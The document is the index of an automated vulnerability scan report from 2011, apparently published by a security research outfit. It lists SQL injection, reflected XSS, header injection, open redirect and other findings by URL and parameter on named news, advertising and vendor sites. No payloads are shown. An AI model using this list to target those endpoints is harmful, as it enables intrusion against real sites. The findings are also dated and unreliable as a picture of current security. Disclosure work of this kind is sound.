XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 06:57:17 CDT 2011.

Loading


1. SQL injection

1.1. http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front [Referer HTTP header]

1.2. http://fanpeeps.com/ [Referer HTTP header]

1.3. http://fanpeeps.com/ [User-Agent HTTP header]

1.4. http://fanpeeps.com/ [__utma cookie]

1.5. http://fanpeeps.com/ [__utmb cookie]

1.6. http://fanpeeps.com/ [__utmb cookie]

1.7. http://fanpeeps.com/ [__utmc cookie]

1.8. http://fanpeeps.com/ [__utmc cookie]

1.9. http://fanpeeps.com/ [__utmc cookie]

1.10. http://fanpeeps.com/ [__utmz cookie]

1.11. http://fanpeeps.com/ [__utmz cookie]

1.12. http://fanpeeps.com/ [idol parameter]

1.13. http://fanpeeps.com/ [name of an arbitrarily supplied request parameter]

1.14. http://fanpeeps.com/ [pid parameter]

1.15. http://fanpeeps.com/bg2.jpg [REST URL parameter 1]

1.16. http://fanpeeps.com/bg2.jpg [__utma cookie]

1.17. http://fanpeeps.com/bg2.jpg [__utmz cookie]

1.18. http://fanpeeps.com/bg2.jpg [name of an arbitrarily supplied request parameter]

1.19. http://fanpeeps.com/function.fopen [REST URL parameter 1]

1.20. http://fanpeeps.com/function.fopen [__utma cookie]

1.21. http://fanpeeps.com/function.fopen [__utmc cookie]

1.22. http://fanpeeps.com/function.fopen [__utmz cookie]

1.23. http://fanpeeps.com/function.fopen [name of an arbitrarily supplied request parameter]

1.24. http://fanpeeps.com/greybox/AJS.js [__utma cookie]

1.25. http://fanpeeps.com/greybox/AJS.js [__utmb cookie]

1.26. http://fanpeeps.com/greybox/AJS.js [__utmc cookie]

1.27. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]

1.28. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]

1.29. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 1]

1.30. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 2]

1.31. http://fanpeeps.com/greybox/gb_scripts.js [Referer HTTP header]

1.32. http://fanpeeps.com/greybox/gb_scripts.js [__utma cookie]

1.33. http://fanpeeps.com/greybox/gb_scripts.js [__utmc cookie]

1.34. http://fanpeeps.com/greybox/gb_scripts.js [__utmz cookie]

1.35. http://fanpeeps.com/greybox/gb_scripts.js [name of an arbitrarily supplied request parameter]

1.36. http://fanpeeps.com/greybox/gb_styles.css [REST URL parameter 1]

1.37. http://fanpeeps.com/greybox/gb_styles.css [Referer HTTP header]

1.38. http://fanpeeps.com/greybox/gb_styles.css [User-Agent HTTP header]

1.39. http://fanpeeps.com/greybox/gb_styles.css [__utma cookie]

1.40. http://fanpeeps.com/greybox/gb_styles.css [__utmb cookie]

1.41. http://fanpeeps.com/greybox/gb_styles.css [__utmc cookie]

1.42. http://fanpeeps.com/greybox/gb_styles.css [__utmz cookie]

1.43. http://fanpeeps.com/media/ [REST URL parameter 1]

1.44. http://fanpeeps.com/media/ [REST URL parameter 1]

1.45. http://fanpeeps.com/media/ [Referer HTTP header]

1.46. http://fanpeeps.com/media/ [User-Agent HTTP header]

1.47. http://fanpeeps.com/media/ [__utma cookie]

1.48. http://fanpeeps.com/media/ [__utmc cookie]

1.49. http://fanpeeps.com/media/ [__utmz cookie]

1.50. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]

1.51. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]

1.52. http://fanpeeps.com/media/ [pid parameter]

1.53. http://fanpeeps.com/mlb [REST URL parameter 1]

1.54. http://fanpeeps.com/ncaa [REST URL parameter 1]

1.55. http://fanpeeps.com/ncaa2.php [REST URL parameter 1]

1.56. http://fanpeeps.com/ncaa2.php [Referer HTTP header]

1.57. http://fanpeeps.com/ncaa2.php [User-Agent HTTP header]

1.58. http://fanpeeps.com/ncaa2.php [__utma cookie]

1.59. http://fanpeeps.com/ncaa2.php [__utmz cookie]

1.60. http://fanpeeps.com/ncaa2.php [__utmz cookie]

1.61. http://fanpeeps.com/ncaa2.php [name of an arbitrarily supplied request parameter]

1.62. http://fanpeeps.com/thumbnailviewer.css [REST URL parameter 1]

1.63. http://fanpeeps.com/thumbnailviewer.css [Referer HTTP header]

1.64. http://fanpeeps.com/thumbnailviewer.css [__utma cookie]

1.65. http://fanpeeps.com/thumbnailviewer.css [__utmb cookie]

1.66. http://fanpeeps.com/thumbnailviewer.css [__utmc cookie]

1.67. http://fanpeeps.com/thumbnailviewer.css [__utmz cookie]

1.68. http://fanpeeps.com/thumbnailviewer.js [REST URL parameter 1]

1.69. http://fanpeeps.com/thumbnailviewer.js [Referer HTTP header]

1.70. http://fanpeeps.com/thumbnailviewer.js [__utma cookie]

1.71. http://fanpeeps.com/thumbnailviewer.js [__utmc cookie]

1.72. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]

1.73. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]

1.74. http://fanpeeps.com/twitterlib.js [REST URL parameter 1]

1.75. http://fanpeeps.com/twitterlib.js [Referer HTTP header]

1.76. http://fanpeeps.com/twitterlib.js [User-Agent HTTP header]

1.77. http://fanpeeps.com/twitterlib.js [__utma cookie]

1.78. http://fanpeeps.com/twitterlib.js [__utmc cookie]

1.79. http://fanpeeps.com/twitterlib.js [__utmz cookie]

1.80. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 3]

1.81. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 4]

1.82. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 1]

1.83. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 5]

1.84. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 1]

1.85. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]

1.86. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 4]

1.87. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 5]

1.88. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252 [REST URL parameter 3]

1.89. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.3-pdv-2/s7523809753358 [REST URL parameter 1]

1.90. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [REST URL parameter 1]

1.91. http://search.twitter.com/search.json [User-Agent HTTP header]

1.92. http://www.fanpeeps.com/ [pid parameter]

2. LDAP injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [Pos parameter]

2.2. http://i1.marketwatch.com/MW5/content/business/css/marketwatch.member.css [REST URL parameter 1]

2.3. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 2]

2.4. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 3]

2.5. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 4]

2.6. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]

2.7. http://s.marketwatch.com/public/resources/documents/PixelTracking.html [REST URL parameter 2]

3. HTTP header injection

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

3.2. http://ad.doubleclick.net/activity [src parameter]

3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.6. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 1]

3.7. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 2]

3.8. http://mp.apmebf.com/ad/js/13754-86576-1281-0 [REST URL parameter 3]

4. Cross-site scripting (reflected)

4.1. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [!category parameter]

4.2. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [name of an arbitrarily supplied request parameter]

4.3. http://ad.doubleclick.net/adi/barrons.com/columnist [!category parameter]

4.4. http://ad.doubleclick.net/adi/barrons.com/public_front [!category parameter]

4.5. http://ad.doubleclick.net/adi/barrons.com/public_front [name of an arbitrarily supplied request parameter]

4.6. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [!category parameter]

4.7. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [name of an arbitrarily supplied request parameter]

4.8. http://ad.doubleclick.net/adi/interactive.wsj.com/business_econ_front [!category parameter]

4.9. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [!category parameter]

4.10. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [name of an arbitrarily supplied request parameter]

4.11. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [!category parameter]

4.12. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [name of an arbitrarily supplied request parameter]

4.13. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

4.14. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

4.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

4.16. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [!category parameter]

4.17. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [name of an arbitrarily supplied request parameter]

4.18. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [!category parameter]

4.19. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tilebot [name of an arbitrarily supplied request parameter]

4.20. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [!category parameter]

4.21. http://ad.doubleclick.net/adi/interactive.wsj.com/rej_front_tiletop [name of an arbitrarily supplied request parameter]

4.22. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [name of an arbitrarily supplied request parameter]

4.23. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [u parameter]

4.24. http://ad.doubleclick.net/adi/marketwatch.com/frontpage [u parameter]

4.25. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]

4.26. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [mc parameter]

4.27. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [name of an arbitrarily supplied request parameter]

4.28. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [!category parameter]

4.29. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [name of an arbitrarily supplied request parameter]

4.30. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [!category parameter]

4.31. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [name of an arbitrarily supplied request parameter]

4.32. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [u parameter]

4.33. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [!category parameter]

4.34. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [name of an arbitrarily supplied request parameter]

4.35. http://ad.doubleclick.net/adj/allthingsd.com/general [name of an arbitrarily supplied request parameter]

4.36. http://ad.doubleclick.net/adj/allthingsd.com/kara_singlepost [name of an arbitrarily supplied request parameter]

4.37. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [!category parameter]

4.38. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [name of an arbitrarily supplied request parameter]

4.39. http://ad.doubleclick.net/adj/barrons.com/survey [!category parameter]

4.40. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [!category parameter]

4.41. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [s parameter]

4.42. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [u parameter]

4.43. http://ad.doubleclick.net/adj/marketwatch.com/frontpage [u parameter]

4.44. http://ad.doubleclick.net/adj/marketwatch.com/markets_futuremovers [p39 parameter]

4.45. http://ad.doubleclick.net/adj/marketwatch.com/mutualfunds_jaffe [p39 parameter]

4.46. http://ad.doubleclick.net/adj/marketwatch.com/personalfinance_story [p39 parameter]

4.47. http://ad.doubleclick.net/adj/smartmoney.com/intromessage [!category parameter]

4.48. http://api.bizographics.com/v1/profile.json [&callback parameter]

4.49. http://api.bizographics.com/v1/profile.json [api_key parameter]

4.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]

4.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.53. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]

4.54. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]

4.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]

4.56. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]

4.57. http://fanpeeps.com/ [action parameter]

4.58. http://fanpeeps.com/ [action parameter]

4.59. http://fanpeeps.com/ [idol parameter]

4.60. http://fanpeeps.com/ [idol parameter]

4.61. http://fanpeeps.com/ [iid parameter]

4.62. http://fanpeeps.com/ [iid parameter]

4.63. http://fanpeeps.com/ [pid parameter]

4.64. http://fanpeeps.com/ [pid parameter]

4.65. http://fanpeeps.com/ [pid parameter]

4.66. http://fanpeeps.com/ [q parameter]

4.67. http://fanpeeps.com/ [q parameter]

4.68. http://fanpeeps.com/ [q parameter]

4.69. http://fanpeeps.com/media/ [pid parameter]

4.70. http://fanpeeps.com/media/ [pid parameter]

4.71. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpck parameter]

4.72. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpvc parameter]

4.73. http://js.revsci.net/gateway/gw.js [csid parameter]

4.74. http://json6.ringrevenue.com/6/map_number [REST URL parameter 2]

4.75. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 1]

4.76. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 2]

4.77. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 3]

4.78. http://jtools.smartmoney.com/marketspectrum/spectrumServer [jsoncallback parameter]

4.79. http://realestate.wsj.com/item/822547 [REST URL parameter 2]

4.80. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [jsoncallback parameter]

4.81. http://server.iad.liveperson.net/hc/44533531/ [lpCallId parameter]

4.82. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [_ parameter]

4.83. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [callback parameter]

4.84. http://topics.wsj.com/api-video/get_video_info.asp [REST URL parameter 2]

4.85. http://www.fanpeeps.com/ [action parameter]

4.86. http://www.fanpeeps.com/ [action parameter]

4.87. http://www.fanpeeps.com/ [iid parameter]

4.88. http://www.fanpeeps.com/ [iid parameter]

4.89. http://www.fanpeeps.com/ [pid parameter]

4.90. http://www.fanpeeps.com/ [pid parameter]

4.91. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 2]

4.92. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 3]

4.93. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 1]

4.94. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 2]

4.95. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 1]

4.96. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 2]

4.97. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 1]

4.98. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 2]

4.99. http://www.marketwatch.com/news/Headline/_HeadlineItem [REST URL parameter 3]

4.100. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [REST URL parameter 1]

4.101. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [REST URL parameter 1]

4.102. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [REST URL parameter 1]

4.103. http://www.midphase.com/favicon.ico [REST URL parameter 1]

4.104. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 1]

4.105. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 2]

4.106. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 3]

4.107. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 4]

4.108. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 1]

4.109. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 2]

4.110. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 3]

4.111. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 4]

4.112. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

4.113. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]

4.114. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]

4.115. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]

4.116. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]

4.117. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]

4.118. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]

4.119. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]

4.120. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]

4.121. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]

4.122. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]

4.123. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_segs cookie]

4.124. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_segs cookie]

4.125. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [BIZO cookie]

4.126. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [BIZO cookie]

4.127. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_csl cookie]

4.128. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_csl cookie]

4.129. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_segs cookie]

4.130. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [rsi_segs cookie]

5. Flash cross-domain policy

5.1. http://0d7292.r.axf8.net/crossdomain.xml

5.2. http://72d329.r.axf8.net/crossdomain.xml

5.3. http://ad.doubleclick.net/crossdomain.xml

5.4. http://altfarm.mediaplex.com/crossdomain.xml

5.5. http://amch.questionmarket.com/crossdomain.xml

5.6. http://api.dimestore.com/crossdomain.xml

5.7. http://b.scorecardresearch.com/crossdomain.xml

5.8. http://bh.contextweb.com/crossdomain.xml

5.9. http://bp.specificclick.net/crossdomain.xml

5.10. http://bs.serving-sys.com/crossdomain.xml

5.11. http://cache-01.cleanprint.net/crossdomain.xml

5.12. http://cdn.eyewonder.com/crossdomain.xml

5.13. http://dowjones.tt.omtrdc.net/crossdomain.xml

5.14. http://ds.serving-sys.com/crossdomain.xml

5.15. http://fls.doubleclick.net/crossdomain.xml

5.16. http://ib.adnxs.com/crossdomain.xml

5.17. http://img.mediaplex.com/crossdomain.xml

5.18. http://js.revsci.net/crossdomain.xml

5.19. http://log30.doubleverify.com/crossdomain.xml

5.20. http://metrics.apple.com/crossdomain.xml

5.21. http://mp.apmebf.com/crossdomain.xml

5.22. http://om.dowjoneson.com/crossdomain.xml

5.23. http://pix04.revsci.net/crossdomain.xml

5.24. http://pixel.quantserve.com/crossdomain.xml

5.25. http://puma.vizu.com/crossdomain.xml

5.26. http://search.twitter.com/crossdomain.xml

5.27. http://secure-us.imrworldwide.com/crossdomain.xml

5.28. http://static.2mdn.net/crossdomain.xml

5.29. http://t.mookie1.com/crossdomain.xml

5.30. http://ad.wsod.com/crossdomain.xml

5.31. http://allthingsd.com/crossdomain.xml

5.32. http://disqus.com/crossdomain.xml

5.33. http://edge.sharethis.com/crossdomain.xml

5.34. http://googleads.g.doubleclick.net/crossdomain.xml

5.35. http://i1.marketwatch.com/crossdomain.xml

5.36. http://i3.marketwatch.com/crossdomain.xml

5.37. http://i4.marketwatch.com/crossdomain.xml

5.38. http://images.apple.com/crossdomain.xml

5.39. http://images.scanalert.com/crossdomain.xml

5.40. http://itunes.apple.com/crossdomain.xml

5.41. http://kara.allthingsd.com/crossdomain.xml

5.42. http://online.barrons.com/crossdomain.xml

5.43. http://online.wsj.com/crossdomain.xml

5.44. http://p.opt.fimserve.com/crossdomain.xml

5.45. http://pubads.g.doubleclick.net/crossdomain.xml

5.46. http://r.mzstatic.com/crossdomain.xml

5.47. http://s.marketwatch.com/crossdomain.xml

5.48. http://server.iad.liveperson.net/crossdomain.xml

5.49. http://static.ak.fbcdn.net/crossdomain.xml

5.50. http://topics.barrons.com/crossdomain.xml

5.51. http://topics.wsj.com/crossdomain.xml

5.52. http://www.facebook.com/crossdomain.xml

5.53. http://www.marketwatch.com/crossdomain.xml

5.54. http://www.mcafeesecure.com/crossdomain.xml

5.55. https://www.mcafeesecure.com/crossdomain.xml

5.56. http://www.smartmoney.com/crossdomain.xml

5.57. http://api.twitter.com/crossdomain.xml

5.58. http://bit.ly/crossdomain.xml

5.59. http://stats.wordpress.com/crossdomain.xml

5.60. http://twitter.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://cdn.eyewonder.com/clientaccesspolicy.xml

6.4. http://metrics.apple.com/clientaccesspolicy.xml

6.5. http://om.dowjoneson.com/clientaccesspolicy.xml

6.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

6.7. http://static.2mdn.net/clientaccesspolicy.xml

6.8. http://stats.wordpress.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://commerce.wsj.com/auth/login

7.2. http://commerce.wsj.com/auth/login

7.3. http://online.barrons.com/article/SB50001424052970203286304576313262992330454.html

7.4. http://online.barrons.com/article/barrons_take.html

7.5. http://online.barrons.com/home-page

7.6. http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html

7.7. http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html

7.8. http://online.wsj.com/article/SB10001424052748703730804576317293981683266.html

7.9. http://online.wsj.com/article/SB10001424052748703730804576317293981683266.html

7.10. http://online.wsj.com/article/SB10001424052748703864204576314083707711492--LESS.html

7.11. http://online.wsj.com/article/SB10001424052748703864204576314083707711492--LESS.html

7.12. http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html

7.13. http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html

7.14. http://online.wsj.com/article/SB10001424052748704681904576315662838806984.html

7.15. http://online.wsj.com/article/SB10001424052748704681904576315662838806984.html

7.16. http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html

7.17. http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html

7.18. http://online.wsj.com/home-page

7.19. http://online.wsj.com/home-page

7.20. http://online.wsj.com/public/page/news-career-jobs.html

7.21. http://online.wsj.com/public/page/news-economy.html

7.22. http://online.wsj.com/public/page/news-real-estate-homes.html

7.23. http://realestate.wsj.com/for-sale/us/10010

7.24. http://realestate.wsj.com/for-sale/us/10010

7.25. http://realestate.wsj.com/item/822547

7.26. http://realestate.wsj.com/item/822547

7.27. http://topics.barrons.com/person/S/michael-santoli/6041

7.28. http://topics.wsj.com/djscript/latest/dj/widget/panels/view/SlidePanel.js

7.29. http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052

7.30. http://www.fins.com/

7.31. http://www.fins.com/Job-Interview-Tips

7.32. http://www.fins.com/Tour.aspx

7.33. http://www.smartmoney.com/

7.34. http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/

8. XML injection

8.1. http://api.dimestore.com/viapi [action parameter]

8.2. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.3. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.4. http://smartmoney.onespot.com/static/nextclick/content_exchange.html [REST URL parameter 1]

8.5. http://smartmoney.onespot.com/static/nextclick/content_exchange.html [REST URL parameter 2]

8.6. http://smartmoney.onespot.com/static/nextclick/content_exchange.html [REST URL parameter 3]

8.7. http://use.typekit.com/k/uhh2the-e.css [REST URL parameter 1]

8.8. http://use.typekit.com/k/uhh2the-e.css [REST URL parameter 2]

9. SQL statement in request parameter

10. SSL cookie without secure flag set

10.1. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

10.2. https://home.mcafee.com/secure/cart/

10.3. https://order.wsj.com/sub/f3

10.4. https://order.wsj.com/sub/f3/cookie_check

10.5. https://order.wsj.com/sub/f3/offer_form

10.6. https://order.wsj.com/sub/xdef/101/6BCWAE_OOT10

10.7. https://order.wsj.com/sub/xdef/113/6BFWA1_OOT

10.8. https://services.wsj.com/Gryphon/jsp/find_acct.jsp

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/standard

11.3. http://fls.doubleclick.net/activityi

11.4. http://l.sharethis.com/pview

11.5. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

11.6. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

11.7. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

11.8. http://server.iad.liveperson.net/hc/10599399/

11.9. http://server.iad.liveperson.net/hc/44533531/

11.10. http://www.facebook.com/extern/login_status.php

11.11. http://www.google.com/realtimejs

11.12. http://www.mcafeesecure.com/us/

11.13. http://www.mcafeesecure.com/us/products/buy_now.jsp

11.14. http://www.mcafeesecure.com/us/products/mcafee_secure.jsp

11.15. https://www.mcafeesecure.com/SignUp.sa

11.16. https://www.mcafeesecure.com/us/products/buy_now.jsp

11.17. https://www.mcafeesecure.com/us/resources/resource.jsp

11.18. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php

12. SSL certificate

12.1. https://www.mcafeesecure.com/

12.2. https://commerce.wsj.com/

12.3. https://order.wsj.com/

12.4. https://services.wsj.com/

13. Open redirection

13.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [rtu parameter]

13.2. http://idolpeeps.com/ [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://allthingsd-kara.disqus.com/remote_auth.js

14.2. http://allthingsd-kara.disqus.com/thread.js

14.3. http://api.twitter.com/1/statuses/user_timeline.json

14.4. http://api.twitter.com/1/urls/resolve.json

14.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

14.6. https://home.mcafee.com/secure/cart/

14.7. http://online.wsj.com/home-page

14.8. http://t.mookie1.com/t/v1/imp

14.9. http://t.mookie1.com/t/v1/imp/cc

14.10. http://us.mcafee.com/root/basket.asp

14.11. http://us.mcafee.com/root/offer.asp

14.12. http://ad.doubleclick.net/activity

14.13. http://ad.doubleclick.net/activity

14.14. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend

14.15. http://ads.revsci.net/adserver/ako

14.16. http://ads.revsci.net/adserver/ako

14.17. http://ads.revsci.net/adserver/ako

14.18. http://altfarm.mediaplex.com/ad/js/13754-86576-1281-0

14.19. http://altfarm.mediaplex.com/ad/js/13754-86576-29158-0

14.20. http://amch.questionmarket.com/adsc/d845473/10/40348193/decide.php

14.21. http://api.bizographics.com/v1/profile.json

14.22. http://b.scorecardresearch.com/b

14.23. http://b.scorecardresearch.com/r

14.24. http://bh.contextweb.com/bh/set.aspx

14.25. http://bp.specificclick.net/

14.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.27. http://c.statcounter.com/t.php

14.28. http://fls.doubleclick.net/activityi

14.29. http://fls.doubleclick.net/activityi

14.30. http://ib.adnxs.com/seg

14.31. http://id.google.com/verify/EAAAACuGG1ZJOl73NLOdE3G8DE0.gif

14.32. http://images.apple.com/global/nav/styles/navigation.css

14.33. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

14.34. http://js.revsci.net/common/pcx.js

14.35. http://l.sharethis.com/pview

14.36. http://leadback.advertising.com/adcedge/lb

14.37. http://m.adnxs.com/msftcookiehandler

14.38. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252

14.39. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s81213273680768

14.40. http://mp.apmebf.com/ad/js/13754-86576-1281-0

14.41. http://odb.outbrain.com/utils/get

14.42. http://odb.outbrain.com/utils/get

14.43. http://odb.outbrain.com/utils/get

14.44. http://odb.outbrain.com/utils/get

14.45. http://odb.outbrain.com/utils/ping.html

14.46. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s77142258654348

14.47. http://online.barrons.com/home

14.48. http://p.opt.fimserve.com/bht/

